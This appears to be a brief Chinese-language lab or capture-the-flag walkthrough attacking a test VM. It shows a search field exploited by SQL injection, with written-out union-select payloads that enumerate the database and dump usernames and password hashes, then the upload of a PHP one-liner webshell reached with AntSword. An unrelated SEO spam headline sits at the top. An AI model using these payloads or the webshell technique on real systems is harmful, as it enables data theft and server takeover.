成都网站建设需要多少钱网站建设兆金手指下拉
第一步:确定靶机IP

第二步:使用御剑后台扫描工具扫描敏感文件

第三步:访问register.php注册登录,进入welcome.php页面

第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)

第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞

第六步:确定闭合方式为单引号

第七步:判断字段数为3、判断回显位置


第八步:爆破数据库名、爆破表名、爆破字段名




#爆破数据库名
OSNT' union select database(),2,3##爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'##爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'##爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users##发现管理员账户
superadmin~2386acb2cf356944177746fc92523983#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php


第十步:访问http://192.168.0.107/uploads/,发现成功上传,使用蚁剑连接,成功!


FROM IYU_
